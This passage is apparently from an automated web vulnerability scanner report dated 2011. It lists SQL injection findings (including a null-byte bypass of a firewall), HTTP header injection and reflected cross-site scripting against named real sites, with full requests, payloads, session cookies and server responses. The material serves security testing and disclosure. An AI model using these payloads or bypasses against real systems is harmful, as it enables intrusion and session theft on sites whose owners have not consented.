There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /s/1627/3/3/_/styles/colors.css?spaceKey=&1%2527=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.mongodb.org

Response 1

HTTP/1.0 503 Server Too Busy
Content-Length: 25
Content-Type: text/html

<h2>Server Too Busy</h2>

Request 2

GET /s/1627/3/3/_/styles/colors.css?spaceKey=&1%2527%2527=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.mongodb.org

Response 2

HTTP/1.1 200 OK
Vary: Accept-Encoding
Cache-Control: max-age=3600
Content-Type: text/css;charset=UTF-8
Date: Wed, 05 Oct 2011 20:49:53 GMT
Expires: Sat, 02 Oct 2021 20:49:53 GMT
X-xgen-cache: yes
X-Cache-Info: caching
Content-Length: 6407

/*
Colors for Confluence (included for all themes by default).
*/


h1, h2, h3, h4, h5, h6,
.wiki-content h1,
.wiki-content h2,
.wiki-content h3,
.wiki-content h4,
.wiki-content h5,
.wiki-content
...[SNIP]...

1.47. http://www.mongodb.org/s/1627/3/3/_/styles/colors.css [spaceKey parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mongodb.org
Path:   /s/1627/3/3/_/styles/colors.css

Issue detail

The spaceKey parameter appears to be vulnerable to SQL injection attacks. The payload %00' was submitted in the spaceKey parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /s/1627/3/3/_/styles/colors.css?spaceKey=%00' HTTP/1.1
Host: www.mongodb.org
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://www.mongodb.org/dosearchsite.action?queryString=xss&where=DOCS
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-903498723-1317847440961; __sid=f958052587ceea881f0f6613baa6bca1affdc622; rack.session=BAh7AA%3D%3D%0A; __utma=266042259.2136194057.1317847505.1317847505.1317847505.1; __utmb=266042259.1.10.1317847505; __utmc=266042259; __utmz=266042259.1317847505.1.1.utmcsr=blog.mongodb.org|utmccn=(referral)|utmcmd=referral|utmcct=/; _mkto_trk=id:017-HGS-593&token:_mch-mongodb.org-1317847440676-16815; WRUID=0; JSESSIONID=ECAABD73E2AD3E5DC62FD99815D51753

Response

HTTP/1.1 500 Internal Server Error
Vary: Accept-Encoding
Cache-Control: max-age=3600
Content-Type: text/html; charset=UTF-8
Date: Wed, 05 Oct 2011 20:45:30 GMT
Connection: close
X-xgen-cache: yes
X-Cache-Info: not cacheable; response code not cacheable


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF
...[SNIP]...
org.springframework.dao.DataIntegrityViolationException: Hibernate operation: Could not execute query; SQL []; ERROR: invalid byte sequence for encoding &quot;UTF8&quot;: 0x00; nested exception is org.postgresql.util.PSQLException: ERROR: invalid byte sequence for encoding &quot;UTF8&quot;: 0x00<br>
...[SNIP]...

1.48. http://www.mongodb.org/s/1627/3/3/_/styles/custom.css [spaceKey parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mongodb.org
Path:   /s/1627/3/3/_/styles/custom.css

Issue detail

The spaceKey parameter appears to be vulnerable to SQL injection attacks. The payload %00' was submitted in the spaceKey parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /s/1627/3/3/_/styles/custom.css?spaceKey=%00' HTTP/1.1
Host: www.mongodb.org
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://www.mongodb.org/dosearchsite.action?queryString=xss&where=DOCS
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-903498723-1317847440961; __sid=f958052587ceea881f0f6613baa6bca1affdc622; rack.session=BAh7AA%3D%3D%0A; __utma=266042259.2136194057.1317847505.1317847505.1317847505.1; __utmb=266042259.1.10.1317847505; __utmc=266042259; __utmz=266042259.1317847505.1.1.utmcsr=blog.mongodb.org|utmccn=(referral)|utmcmd=referral|utmcct=/; _mkto_trk=id:017-HGS-593&token:_mch-mongodb.org-1317847440676-16815; WRUID=0; JSESSIONID=ECAABD73E2AD3E5DC62FD99815D51753

Response

HTTP/1.1 500 Internal Server Error
Vary: Accept-Encoding
Cache-Control: max-age=3600
Content-Type: text/html; charset=UTF-8
Date: Wed, 05 Oct 2011 20:45:30 GMT
Connection: close
X-xgen-cache: yes
X-Cache-Info: not cacheable; response code not cacheable


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF
...[SNIP]...
org.springframework.dao.DataIntegrityViolationException: Hibernate operation: Could not execute query; SQL []; ERROR: invalid byte sequence for encoding &quot;UTF8&quot;: 0x00; nested exception is org.postgresql.util.PSQLException: ERROR: invalid byte sequence for encoding &quot;UTF8&quot;: 0x00<br>
...[SNIP]...

1.49. http://www.mongodb.org/s/1627/3/4/_/styles/combined.css [spaceKey parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mongodb.org
Path:   /s/1627/3/4/_/styles/combined.css

Issue detail

The spaceKey parameter appears to be vulnerable to SQL injection attacks. The payload %00' was submitted in the spaceKey parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /s/1627/3/4/_/styles/combined.css?spaceKey=community%00' HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.mongodb.org

Response

HTTP/1.1 500 Internal Server Error
Vary: Accept-Encoding
Cache-Control: max-age=3600
Content-Type: text/html;charset=utf-8
Date: Wed, 05 Oct 2011 20:50:38 GMT
Connection: close
X-xgen-cache: yes
X-Cache-Info: not cacheable; response code not cacheable

<html><head><title>Apache Tomcat/5.5.20 - Error report</title><style><!--H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans
...[SNIP]...
org.springframework.dao.DataIntegrityViolationException: Hibernate operation: Could not execute query; SQL []; ERROR: invalid byte sequence for encoding &quot;UTF8&quot;: 0x00; nested exception is org.postgresql.util.PSQLException: ERROR: invalid byte sequence for encoding &quot;UTF8&quot;: 0x00
   org.springframework.jdbc.support.SQLStateSQLExceptionTranslator.translate(SQLStateSQLExceptionTranslator.java:110)
...[SNIP]...

1.50. http://www.mongodb.org/s/1627/3/5/_/styles/combined.css [spaceKey parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mongodb.org
Path:   /s/1627/3/5/_/styles/combined.css

Issue detail

The spaceKey parameter appears to be vulnerable to SQL injection attacks. The payload %00' was submitted in the spaceKey parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /s/1627/3/5/_/styles/combined.css?spaceKey=DOCSJP%00' HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.mongodb.org

Response

HTTP/1.1 500 Internal Server Error
Vary: Accept-Encoding
Cache-Control: max-age=3600
Content-Type: text/html;charset=utf-8
Date: Wed, 05 Oct 2011 20:50:41 GMT
Connection: close
X-xgen-cache: yes
X-Cache-Info: not cacheable; response code not cacheable

<html><head><title>Apache Tomcat/5.5.20 - Error report</title><style><!--H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans
...[SNIP]...
org.springframework.dao.DataIntegrityViolationException: Hibernate operation: Could not execute query; SQL []; ERROR: invalid byte sequence for encoding &quot;UTF8&quot;: 0x00; nested exception is org.postgresql.util.PSQLException: ERROR: invalid byte sequence for encoding &quot;UTF8&quot;: 0x00
   org.springframework.jdbc.support.SQLStateSQLExceptionTranslator.translate(SQLStateSQLExceptionTranslator.java:110)
...[SNIP]...

1.51. http://www.mongodb.org/s/1627/3/6/_/styles/combined.css [spaceKey parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mongodb.org
Path:   /s/1627/3/6/_/styles/combined.css

Issue detail

The spaceKey parameter appears to be vulnerable to SQL injection attacks. The payload %00' was submitted in the spaceKey parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /s/1627/3/6/_/styles/combined.css?spaceKey=DOCSFR%00' HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.mongodb.org

Response

HTTP/1.1 500 Internal Server Error
Vary: Accept-Encoding
Cache-Control: max-age=3600
Content-Type: text/html;charset=utf-8
Date: Wed, 05 Oct 2011 20:50:26 GMT
Connection: close
X-xgen-cache: yes
X-Cache-Info: not cacheable; response code not cacheable

<html><head><title>Apache Tomcat/5.5.20 - Error report</title><style><!--H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans
...[SNIP]...
org.springframework.dao.DataIntegrityViolationException: Hibernate operation: Could not execute query; SQL []; ERROR: invalid byte sequence for encoding &quot;UTF8&quot;: 0x00; nested exception is org.postgresql.util.PSQLException: ERROR: invalid byte sequence for encoding &quot;UTF8&quot;: 0x00
   org.springframework.jdbc.support.SQLStateSQLExceptionTranslator.translate(SQLStateSQLExceptionTranslator.java:110)
...[SNIP]...

1.52. http://www.mongodb.org/s/1627/3/6/_/styles/custom.css [spaceKey parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mongodb.org
Path:   /s/1627/3/6/_/styles/custom.css

Issue detail

The spaceKey parameter appears to be vulnerable to SQL injection attacks. The payload %00' was submitted in the spaceKey parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /s/1627/3/6/_/styles/custom.css?spaceKey=DOCSFR%00' HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.mongodb.org

Response

HTTP/1.1 500 Internal Server Error
Vary: Accept-Encoding
Cache-Control: max-age=3600
Content-Type: text/html; charset=UTF-8
Date: Wed, 05 Oct 2011 20:50:27 GMT
Connection: close
X-xgen-cache: yes
X-Cache-Info: not cacheable; response code not cacheable


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF
...[SNIP]...
org.springframework.dao.DataIntegrityViolationException: Hibernate operation: Could not execute query; SQL []; ERROR: invalid byte sequence for encoding &quot;UTF8&quot;: 0x00; nested exception is org.postgresql.util.PSQLException: ERROR: invalid byte sequence for encoding &quot;UTF8&quot;: 0x00<br>
...[SNIP]...

1.53. http://www.skillshare.com/data/0/0/1/12/nyc [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.skillshare.com
Path:   /data/0/0/1/12/nyc

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 3, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /data/0/0'/1/12/nyc HTTP/1.1
Host: www.skillshare.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.skillshare.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1785085429-1317847473600; PHPSESSID=hkq01kt0p7olkgqdbu61ggaqn3; __utma=99704988.1177393695.1317847691.1317847691.1317847691.1; __utmb=99704988.1.10.1317847691; __utmc=99704988; __utmz=99704988.1317847691.1.1.utmcsr=blog.skillshare.com|utmccn=(referral)|utmcmd=referral|utmcct=/post/11061623706/ms-bailey

Response

HTTP/1.1 500 CDbException
Server: nginx/0.7.62
Date: Wed, 05 Oct 2011 20:50:45 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 330

CDbCommand failed to execute the SQL statement: SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''))
ORDER BY C.start_ts ASC LIMIT 1372)
' at line 3

2. HTTP header injection
There are 3 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.

2.1. http://dw.com.com/clear/c.gif [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dw.com.com
Path:   /clear/c.gif

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 5f224%0d%0a4ea4acacfd7 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /clear/5f224%0d%0a4ea4acacfd7?ptid=2100&onid=201&asid=20115857&astid=1&x_breadcrumb=201&pguid=1317839886720922036497155&testgroup=1&testname=storyblog&testversion=6&ts=1317839896688&sid=162&ld=www.cbsnews.com&ldc=694b22b2-d846-47a8-9bd9-5b049588f45c&xrq=gcx%3Dc%26sourceid%3Dchrome%26ie%3DUTF-8%26q%3Dcbs%2Bnew%2Byork&oid=2100-201_162-20115857&brflv=10.3.183&brwinsz=1032x890&brscrsz=1920x1200&brlang=en-US&tcset=utf8&im=dwjs&xref=http%3A%2F%2Fwww.google.com%2Fsearch&srcurl=http%3A%2F%2Fwww.cbsnews.com%2Fstories%2F2011%2F10%2F05%2Fnational%2Fmain20115857.shtml&title=Unions%20add%20strength%20to%20Wall%20St.%20protests%20-%20CBS%20News HTTP/1.1
Host: dw.com.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.cbsnews.com/stories/2011/10/05/national/main20115857.shtml
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: XCLGFbrowser=Cg8IL05erE98AAAAVzE

Response

HTTP/1.1 302 Found
Date: Wed, 05 Oct 2011 18:41:30 GMT
Server: Apache/2.0
Pragma: no-cache
Cache-control: no-cache, must-revalidate, no-transform
Vary: *
Expires: Fri, 23 Jan 1970 12:12:12 GMT
Location: http://dw.cbsnews.com/clear/5f224
4ea4acacfd7
?ts=1317840090982195&clgf=Cg8IL05erE98AAAAVzE
Content-Length: 0
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Content-Type: image/gif

2.2. http://iv.doubleclick.net/pfadx/nbcu.lim.ny/131129433_undefined_weather_ [dcmt parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://iv.doubleclick.net
Path:   /pfadx/nbcu.lim.ny/131129433_undefined_weather_

Issue detail

The value of the dcmt request parameter is copied into the Content-Type response header. The payload 8e984%0d%0af1fa4b4f7b6 was submitted in the dcmt parameter. This caused a response containing an injected HTTP header.

Request

GET /pfadx/nbcu.lim.ny/131129433_undefined_weather_;dcmt=8e984%0d%0af1fa4b4f7b6 HTTP/1.1
Host: iv.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.nbcnewyork.com/pdk442/pdk/swf/flvPlayer.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: 8e984
f1fa4b4f7b6
:
Content-Length: 267
Cache-Control: no-cache
Pragma: no-cache
Date: Wed, 05 Oct 2011 18:24:01 GMT
Expires: Wed, 05 Oct 2011 18:24:01 GMT
DCLK_imp: v7;x;44306;0-0;0;25398738;0/0;0/0/0;;~aopt=2/0/b2/0;~okv=;dcmt=8e984f1fa4b4f7b6;~cs=f

<a target="_top" href="http://iv.doubleclick.net/click;h=v8/3b97/0/0/%2a/g;44306;0-0;0;25398738;367-300/125;0/0/0;;~okv=;dcmt=8e984f1fa4b4f7b6;~aopt=2/0/b2/0;~sscs=%3f"><img src="http://s0.2mdn.net/vi
...[SNIP]...

2.3. https://signon.telstra.com/login [noFormURL parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://signon.telstra.com
Path:   /login

Issue detail

The value of the noFormURL request parameter is copied into the Location response header. The payload 509b2%0d%0a0404ce4801a was submitted in the noFormURL parameter. This caused a response containing an injected HTTP header.

Request

GET /login?noFormURL=https%3A%2F%2Fwww.my.telstra.com.au%2Fmyaccount509b2%0d%0a0404ce4801a&goto=http%3A%2F%2Fwww.my.telstra.com.au%3A80%2Fmyaccount%2Foverview HTTP/1.1
Host: signon.telstra.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://telstra.com.au/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2745A984851D17A0-400001414000001C[CE]; VISITORID=1277333297; mbox=check#true#1317840778|session#1317840717795-784590#1317842578; s_cc=true; s_loggedin=not%20logged%20in; s_nr=1317840718091; scPrevious=CrowdSupport; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 302 Moved Temporarily
Server: Sun-Web-Server
Date: Wed, 05 Oct 2011 18:52:34 GMT
Cache-control: no-cache
Location: https://www.my.telstra.com.au/myaccount509b2
0404ce4801a

Content-length: 0
Set-Cookie: BIGipServerpl_bpraa_auth_gw_http=132584108.20480.0000; expires=Wed, 05-Oct-2011 19:12:34 GMT; path=/

3. Cross-site scripting (reflected)
There are 424 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.

3.1. http://ad.adlegend.com/jscript [@CPSC@ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.adlegend.com
Path:   /jscript

Issue detail

The value of the @CPSC@ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload efd5b'%3balert(1)//b9c84530d46 was submitted in the @CPSC@ parameter. This input was echoed as efd5b';alert(1)//b9c84530d46 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jscript?spacedesc=2048146_1080838_300x160_1136436_2048146&ML_NIF=N&target=_blank&@CPSC@=efd5b'%3balert(1)//b9c84530d46 HTTP/1.1
Host: ad.adlegend.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.nbcnewyork.com/news/local/Helicopter-Crash-East-River-Death-Tourist-Rescue-Victims-Bloomberg--131125518.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ID=OPT_OUT

Response

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 18:20:51 GMT
Server: Apache
Cache-Control: no-cache, must-revalidate
Expires: Tue, 1 Jan 1970 01:01:01 GMT
Pragma: no-cache
P3P: policyref="http://ad.adlegend.com/p3p.xml", CP="BUS COM COR DEVa DSP NAV NOI OUR PRE STA TAIa UNI"
x_transtrans: 42.6.10.688
Set-Cookie: PrefID=deleted; path=/; domain=.adlegend.com; expires=Mon, 01 Feb 1999 01:01:01 GMT;
Set-Cookie: MLCursor=deleted; path=/; domain=.adlegend.com; expires=Mon, 01 Feb 1999 01:01:01 GMT;
Set-Cookie: MLCPrf=deleted; path=/; domain=.adlegend.com; expires=Mon, 01 Feb 1999 01:01:01 GMT;
Set-Cookie: MLDup=deleted; path=/; domain=.adlegend.com; expires=Mon, 01 Feb 1999 01:01:01 GMT;
Set-Cookie: CSList=deleted; path=/; domain=.adlegend.com; expires=Mon, 01 Feb 1999 01:01:01 GMT;
Set-Cookie: CTList=deleted; path=/; domain=.adlegend.com; expires=Mon, 01 Feb 1999 01:01:01 GMT;
Set-Cookie: XGIR=deleted; path=/; domain=.adlegend.com; expires=Mon, 01 Feb 1999 01:01:01 GMT;
Content-Type: application/x-javascript
Content-Length: 449
Connection: close

document.write('<A HREF="http://ad.adlegend.com/click.ng?spacedesc=2048146_1080838_300x160_1136436_2048146&af=1120340&ml_pkgkw=-%253A%2522%2522&ml_pbi=-2048146&ml_camp=1076702&ml_crid=2148579&click=efd5b';alert(1)//b9c84530d46http://www.nbc.com/up-all-night/" TARGET="_blank">
...[SNIP]...

3.2. http://ad.adlegend.com/jscript [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.adlegend.com
Path:   /jscript

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9121b'-alert(1)-'fc30105dd5d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jscript?spacedesc=2048146_1080838_300x160_1136436_2048146&ML_NIF=N&target=_blank&@CPSC@=&9121b'-alert(1)-'fc30105dd5d=1 HTTP/1.1
Host: ad.adlegend.com
